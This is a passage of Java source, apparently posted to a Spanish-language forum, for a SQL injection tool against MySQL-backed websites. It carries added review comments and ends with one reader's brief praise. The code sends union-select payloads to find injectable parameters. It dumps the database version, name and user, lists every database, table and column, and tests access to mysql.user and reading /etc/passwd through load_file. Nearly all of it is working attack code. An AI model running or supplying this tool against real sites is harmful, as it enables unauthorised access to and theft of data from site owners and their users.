         * {@code WHERE} clause needs no quotes. A {@code count(*)} query is
         * issued first, then one {@code LIMIT x,1} query per table; results are
         * fenced with the {@code 0x4b30425241} ("K0BRA") marker and cut out
         * with a regex.
         *
         * <p>NOTE(review): the loop runs {@code x <= finals} (one request past
         * the last row) and the count goes through an unguarded
         * {@code Integer.parseInt}; the same pattern is repeated in
         * {@link #getcolbydb}, {@link #getdbs}, {@link #schemacolumns} and
         * {@link #schematables}.
         *
         * @param urla injection URL containing the {@code hackman} placeholder
         * @param db   database (table_schema) name, as typed by the user
         * @throws Exception propagated from {@link #toma}
         */
        private static void getablesbydb(String urla, String db) throws Exception {

            String web1;
            String web2;
            String code;
            String data;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            data = encodehex(db);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

            System.out.println("\n[+] Getting Tables ....");

            code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n");
                savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Table Found : " + dos.group(1));
                        savefile(urla, "[+] Table Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }


        }

        /**
         * Option 3: lists every database name the injected account can see,
         * from {@code information_schema.schemata}.
         *
         * <p>A {@code count(*)} query is issued first, then one
         * {@code LIMIT x,1} query per schema; results are fenced with the
         * {@code 0x4b30425241} ("K0BRA") marker and cut out with a regex.
         *
         * <p>NOTE(review): the loop runs {@code x <= finals} (one request past
         * the last row) and the count goes through an unguarded
         * {@code Integer.parseInt}; the same pattern is repeated in
         * {@link #getcolbydb}, {@link #getablesbydb}, {@link #schemacolumns}
         * and {@link #schematables}.
         *
         * @param urla injection URL containing the {@code hackman} placeholder
         * @throws Exception propagated from {@link #toma}
         */
        private static void getdbs(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");

            System.out.println("\n[+] Getting DBS ....");

            code = toma(web1 + "+from+information_schema.schemata--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] DB Found : " + dos.group(1));
                        savefile(urla, "[+] DB Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        /**
         * Option 2: lists the columns of every table named {@code nombre}, from
         * {@code information_schema.columns}.
         *
         * <p>Only {@code table_name} is filtered — there is no
         * {@code table_schema} condition — so if several databases contain a
         * table of that name, their columns are all returned together. The
         * name is hex-encoded with {@link #encodehex}; a
         * {@code count(column_name)} query is issued first (the other helpers
         * use {@code count(*)}), then one {@code LIMIT x,1} query per column,
         * each fenced with the {@code 0x4b30425241} ("K0BRA") marker.
         *
         * <p>NOTE(review): the loop runs {@code x <= finals} (one request past
         * the last row) and the count goes through an unguarded
         * {@code Integer.parseInt}; the same pattern is repeated in
         * {@link #getcolbydb}, {@link #getablesbydb}, {@link #getdbs} and
         * {@link #schematables}.
         *
         * @param urla   injection URL containing the {@code hackman} placeholder
         * @param nombre table name, as typed by the user
         * @throws Exception propagated from {@link #toma}
         */
        private static void schemacolumns(String urla, String nombre) throws Exception {

            String web1;
            String web2;
            String code;
            String tablexa;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            tablexa = encodehex(nombre);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

            System.out.println("\n[+] Getting columns ....");

            code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Column Found : " + dos.group(1));
                        savefile(urla, "[+] Column Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        /**
         * Option 1: lists every table name visible to the injected account,
         * from {@code information_schema.tables} with no schema filter (so
         * system schemas are included alongside the application's).
         *
         * <p>A {@code count(table_name)} query is issued first, then one
         * {@code LIMIT x,1} query per table; results are fenced with the
         * {@code 0x4b30425241} ("K0BRA") marker and cut out with a regex.
         *
         * <p>NOTE(review): {@code savefile(urla, "")} writes an empty entry
         * where the other options log a header — presumably a leftover. The
         * loop runs {@code x <= finals} (one request past the last row) and
         * the count goes through an unguarded {@code Integer.parseInt}; the
         * same pattern is repeated in {@link #getcolbydb},
         * {@link #getablesbydb}, {@link #getdbs} and {@link #schemacolumns}.
         *
         * @param urla injection URL containing the {@code hackman} placeholder
         * @throws Exception propagated from {@link #toma}
         */
        private static void schematables(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

            System.out.println("\n[+] Getting tables ....\n");

            code = toma(web1 + "+from+information_schema.tables--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] Tables Found : " + dos.group(1) + "\n");

                // Empty log entry (see note above).
                savefile(urla, "");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Table Found : " + dos.group(1));
                        savefile(urla, "[+] Table Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        /**
         * Checks whether {@code urla} is injectable and, if so, determines the
         * column count and the echoed column, then hands off to manejo().
         *
         * Step 1 appends "-1+union+select+666--" and looks for MySQL's
         * "different number of columns" error text in the response. Step 2 tries
         * 1..5 columns, each column holding the hex-encoded marker RATSXPDOWN<n>;
         * the first response echoing "RATSXPDOWN<digits>" fixes the column count
         * ({@code x}) and the echoed position. That position is swapped for the
         * "hackman" placeholder the other routines expect, the result is logged,
         * manejo(link) runs the menu, and the JVM exits.
         *
         * Detection note for defenders: the probes are recognisable by the literal
         * "union+select+666--" in the query string, by the hex form of RATSXPDOWN
         * (0x524154535850444f574e) in later requests, and by "RATSXPDOWN" followed
         * by a digit in a response body.
         *
         * @param urla base URL ending in the injectable parameter (e.g. "...?id=")
         * @throws Exception propagated from toma(), savefile() and manejo()
         */
        private static void scan(String urla) throws Exception {

            String codex;
            String target;

            Pattern uno = null;
            Matcher dos = null;

            target = urla;

            System.out.println("\n[+] Checking ...\n");

            // Deliberately mismatched column count: the page is considered
            // vulnerable only if the server's error text leaks into the response.
            codex = toma(target + "-1+union+select+666--");

            uno = Pattern.compile("The used SELECT statements have a different number of columns");
            dos = uno.matcher(codex);

            if (dos.find()) {
                System.out.println("[+] Scanning ...\n");

                int x;
                String urlfinal;
                String otrofinal;
                String code;
                String formariny;
                String otroformar;
                String link;

                // urlfinal accumulates the hex markers, formariny the plain
                // column numbers; both grow by one entry per iteration.
                urlfinal = "";
                formariny = "";

                // Hard-coded upper bound of 5 columns.
                for (x = 1; x <= 5; x = x + 1) {

    //urlfinal = urlfinal+x+",";
                    urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
                    formariny = formariny + x + ",";

                    otrofinal = urlfinal;
                    otroformar = formariny;

                    // Strip the trailing comma before use.
                    otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
                    otroformar = otroformar.substring(0, otroformar.length() - 1);

                    code = toma(target + "-1+union+select+" + otrofinal);

                    uno = Pattern.compile("RATSXPDOWN(\\d+)");
                    dos = uno.matcher(code);

                    if (dos.find()) {

                        // replace() substitutes every occurrence of the digit;
                        // with x <= 5 each column number is a single distinct
                        // digit, so exactly one position becomes "hackman".
                        otroformar = otroformar.replace(dos.group(1), "hackman");

                        link = target + "-1+union+select+" + otroformar;

                        System.out.println("[Target] : " + link);
                        System.out.println("[Limit] : The site has " + x + " columns");
                        System.out.println("[Data] : The number " + dos.group(1) + " print data");

                        savefile(link, "\r\n" + "[Target] : " + link);
                        savefile(link, "[Limit] : The site has " + x + " columns");
                        savefile(link, "[Data] : The number " + dos.group(1) + " print data");

                        manejo(link);

                        // NOTE(review): exits with status 1 on the success path;
                        // a shell wrapper reading the exit status would treat the
                        // run as failed. Exiting here also means scan() never
                        // returns to its caller once a result is found.
                        System.exit(1);

                    }

                }
                // Reached only when none of the 1..5 column probes echoed the marker.
                System.out.println("[-] Error");
            } else {
                System.out.println("[-] Not vulnerable");
            }

        }

        /**
         * Fingerprints the back-end: version(), database() and user(), then
         * whether information_schema, mysql.user and load_file() are reachable.
         *
         * The "hackman" placeholder in {@code urla} is replaced by a concat() of
         * the three functions separated by char(69,82,84,79,82,56,53,52), which
         * is the ASCII text "ERTOR854"; a four-marker regex then cuts the three
         * values out of the page. The same marker alone is next selected from
         * information_schema.tables and from mysql.user, and finally concatenated
         * with load_file(0x2f6574632f706173737764) (the bytes of "/etc/passwd");
         * each of these probes is judged solely by whether "ERTOR854" appears in
         * the response. Findings are printed and appended to the per-host log.
         *
         * Detection note for defenders: all four requests carry the literal
         * "char(69,82,84,79,82,56,53,52)" in the query string; the last one also
         * carries "load_file(0x2f6574632f706173737764)".
         *
         * @param urla injection URL containing "hackman"; rewritten locally for
         *             each probe, the caller's string is unaffected
         * @throws Exception propagated from toma() and savefile()
         */
        private static void details(String urla) throws Exception {

            String concat;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            // Marker, value, marker, value, marker, value, marker.
            concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

            urla = urla.replace("hackman", concat);

            // Runtime string kept as written ("informaion").
            System.out.println("\n[+] Searching informaion ...\n");

            code = toma(urla);

            // Groups 1..3 are version(), database(), user() in that order.
            uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] DB Version : " + dos.group(1));
                System.out.println("[+] DB Name : " + dos.group(2));
                System.out.println("[+] Username : " + dos.group(3));

                savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1));
                savefile(urla, "[+] DB Name : " + dos.group(2));
                savefile(urla, "[+] Username : " + dos.group(3));

            } else {
                System.out.println("[-] Not found any data");
            }

            // From here on only the bare marker is selected; the probes below
            // succeed if the marker is echoed at all.
            urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

            code = toma(urla + "+from+information_schema.tables--");
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] information_schema : on");
                savefile(urla, "[+] information_schema : on");
            } else {
                System.out.println("[-] information_schema : off");
            }

            code = toma(urla + "+from+mysql.user--");
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] mysqluser : on");
                savefile(urla, "[+] mysqluser : on");
            } else {
                // Runtime string kept as written ("mysquser").
                System.out.println("[-] mysquser : off");
            }

            // Marker concatenated with load_file(): a missing FILE privilege makes
            // load_file() return NULL, which the concat() swallows, so the marker
            // is echoed only when the read worked.
            urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

            code = toma(urla);
            uno = Pattern.compile("ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {
                // NOTE(review): the success branch is prefixed "[-]" unlike every
                // other "on" message in this routine, which use "[+]".
                System.out.println("[-] load_file : on");
                savefile(urla, "[-] load_file : on");
            } else {
                System.out.println("[-] load_file : off");
            }

        }

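        /**
         * Appends one line of text to the per-host log file {@code logs/<host>.txt}.
         *
         * The log name is taken from the host part of {@code nombre}, so every
         * URL built for the same target lands in the same file. The file is
         * opened in append mode, written as UTF-8 and closed even if the write
         * fails (the original left the FileWriter open on an exception and used
         * the platform default charset).
         *
         * @param nombre a URL; only its host is used to choose the log file
         * @param texto  the line to append; a CRLF terminator is added
         * @throws Exception if {@code nombre} is not a valid URL or the file under
         *                   {@code logs/} cannot be opened or written — the
         *                   directory is not created here
         */
        private static void savefile(String nombre, String texto) throws Exception {

            URL h = new URL(nombre);

            String formar = "logs/" + h.getHost() + ".txt";

            // try-with-resources closes the writer on both the normal and the
            // exceptional path; fully-qualified names avoid a new import.
            try (java.io.Writer writer = new java.io.OutputStreamWriter(
                    new java.io.FileOutputStream(formar, true),
                    java.nio.charset.StandardCharsets.UTF_8)) {
                writer.write(texto + "\r\n");
            }

        }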

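        /**
         * Performs an HTTP GET on {@code urla} and returns the response body as a
         * single string.
         *
         * Lines are concatenated without separators (readLine() strips them), so
         * callers run their regexes over a one-line body. The reader is closed on
         * both the normal and the exceptional path (the original leaked it when
         * readLine() threw) and the body is decoded as UTF-8 instead of the
         * platform default. Unchanged: no connect or read timeout is set, so an
         * unresponsive host blocks the caller indefinitely, and the fixed
         * User-Agent header is sent exactly as before.
         *
         * @param urla absolute URL to fetch
         * @return the concatenated response body; empty for an empty response
         * @throws Exception on a malformed URL or any I/O failure; for HTTP URLs an
         *                   error status is expected to surface as an IOException
         *                   from getInputStream()
         */
        private static String toma(String urla) throws Exception {

            StringBuilder conte = new StringBuilder();

            URL url = new URL(urla);
            URLConnection hc = url.openConnection();
            hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

            try (BufferedReader nave = new BufferedReader(
                    new InputStreamReader(hc.getInputStream(),
                            java.nio.charset.StandardCharsets.UTF_8))) {
                String re;
                while ((re = nave.readLine()) != null) {
                    conte.append(re);
                }
            }

            return conte.toString();

        }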

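        /**
         * Hex-encodes {@code text} as a MySQL-style literal: "0x" followed by two
         * lowercase hex digits per byte of the UTF-8 encoding.
         *
         * Fix: the original appended Integer.toHexString() per byte, which drops
         * the leading zero for bytes below 0x10 (a newline became "a" rather than
         * "0a"), giving an odd-length and therefore misaligned literal. For
         * printable ASCII input — all the visible caller, scan(), ever passes —
         * the output is unchanged. Bytes are now taken as UTF-8 rather than the
         * platform default charset.
         *
         * @param text the string to encode; the empty string yields "0x"
         * @return "0x" plus the hex digits of the UTF-8 bytes of {@code text}
         */
        public static String encodehex(String text) {

            //Thanks to Katarina Majetic
            //Based on http://www.dzone.com/snippets/encode-string-hex

            byte[] z = text.getBytes(java.nio.charset.StandardCharsets.UTF_8);
            StringBuilder h = new StringBuilder(2 + 2 * z.length);
            h.append("0x");

            for (byte b : z) {
                // %02x keeps the leading zero for bytes < 0x10; & 0xFF undoes
                // the sign extension of byte -> int.
                h.append(String.format("%02x", b & 0xFF));
            }
            return h.toString();
        }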
    }

    //The End ?


Slider324

wow voy a darle una ojeada  ;-) ;-) muy buen trabajo